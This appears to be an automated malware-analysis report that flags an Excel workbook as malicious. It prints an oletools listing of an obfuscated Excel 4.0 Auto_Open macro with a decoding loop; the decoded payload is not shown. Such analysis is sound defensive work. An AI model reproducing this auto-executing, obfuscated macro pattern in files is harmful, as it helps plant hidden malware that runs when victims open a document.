MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6856 bytes |

SHA-256: 5c70df707cf0e4d7b30d5d0e2a444e86bb8a41c3d43e3c99134405b9743d058a

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - DFWqOsU
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F182
' 0018 21 LABEL : Cell Value, String Constant - ayaViC len=0
' 0018 20 LABEL : Cell Value, String Constant - FwCQh len=0
' 0018 27 LABEL : Cell Value, String Constant - fyIRNWlzStdu len=0
' 0018 25 LABEL : Cell Value, String Constant - gGjQoODRLV len=0
' 0018 26 LABEL : Cell Value, String Constant - GlMGBmgkfmF len=0
' 0018 25 LABEL : Cell Value, String Constant - gyjJdxieNA len=0
' 0018 24 LABEL : Cell Value, String Constant - HDzlwcbBr len=0
' 0018 27 LABEL : Cell Value, String Constant - ioIQsWiOAYak len=0
' 0018 23 LABEL : Cell Value, String Constant - JdbmICAf len=0
' 0018 22 LABEL : Cell Value, String Constant - kQIBAbX len=0
' 0018 24 LABEL : Cell Value, String Constant - MLvyOScfx len=0
' 0018 25 LABEL : Cell Value, String Constant - nLOfFzQueV len=0
' 0018 20 LABEL : Cell Value, String Constant - Nzlwl len=0
' 0018 21 LABEL : Cell Value, String Constant - qjfrvc len=0
' 0018 22 LABEL : Cell Value, String Constant - SeCSund len=0
' 0018 20 LABEL : Cell Value, String Constant - USyRw len=0
' 0018 26 LABEL : Cell Value, String Constant - UumVrRtCXDU len=0
' 0018 26 LABEL : Cell Value, String Constant - VOvvoqOuDxe len=0
' 0018 24 LABEL : Cell Value, String Constant - YEechgFUA len=0
' 0018 27 LABEL : Cell Value, String Constant - ZewozlmJDGSS len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' DFWqOsU,Q41,"",255.00000000000000000000
' DFWqOsU,Q42,"",987.00000000000000000000
' DFWqOsU,Q43,"",149.00000000000000000000
' DFWqOsU,Q44,"",73.00000000000000000000
' DFWqOsU,Q45,"",261.00000000000000000000
' DFWqOsU,Q46,"",546.00000000000000000000
' DFWqOsU,F91,"SET.NAME("VOvvoqOuDxe",0+VALUE("0"))",""
' DFWqOsU,F95,"SET.NAME("gGjQoODRLV",VOvvoqOuDxe)",""
' DFWqOsU,F100,"SET.NAME("FwCQh",VOvvoqOuDxe)",""
' DFWqOsU,F104,"SET.NAME("UumVrRtCXDU",COUNTA(YEechgFUA))",""
' DFWqOsU,F106,"SET.NAME("nLOfFzQueV",COUNTA(HDzlwcbBr))",""
' DFWqOsU,F110,[],""
' DFWqOsU,F114,"SET.NAME("SeCSund","")",""
' DFWqOsU,F118,"gGjQoODRLV",""
' DFWqOsU,F123,"SET.NAME("GlMGBmgkfmF",HLOOKUP("*",YEechgFUA,gGjQoODRLV,FALSE))",""
' DFWqOsU,F125,"JdbmICAf",""
' DFWqOsU,F128,"SET.NAME("ZewozlmJDGSS",VOvvoqOuDxe)",""
' DFWqOsU,F132,[],""
' DFWqOsU,F136,"ZewozlmJDGSS",""
' DFWqOsU,F140,"qjfrvc",""
' DFWqOsU,F142,"USyRw",""
' DFWqOsU,F146,"kQIBAbX",""
' DFWqOsU,F151,"SET.NAME("MLvyOScfx",VALUE(HLOOKUP("*",HDzlwcbBr,kQIBAbX,FALSE)))",""
' DFWqOsU,F153,"Nzlwl",""
' DFWqOsU,F158,"SeCSund",""
' DFWqOsU,F161,"FwCQh",""
' DFWqOsU,F164,NEXT(),""
' DFWqOsU,F168,"ayaViC",""
' DFWqOsU,F170,[],""
' DFWqOsU,F175,"fyIRNWlzStdu",""
' DFWqOsU,F177,NEXT(),""
' DFWqOsU,F180,RETURN(),""
' DFWqOsU,F205,"SET.NAME("ioIQsWiOAYak",F91)",""
' DFWqOsU,F210,"YEechgFUA",""
' DFWqOsU,F213,"SET.NAME("HDzlwcbBr",R89C13)",""
' DFWqOsU,F215,"SET.NAME("fyIRNWlzStdu",224)",""
' DFWqOsU,F220,"SET.NAME("gyjJdxieNA",6)",""
' DFWqOsU,F223,ioIQsWiOAYak(),""
' DFWqOsU,F224,HALT(),""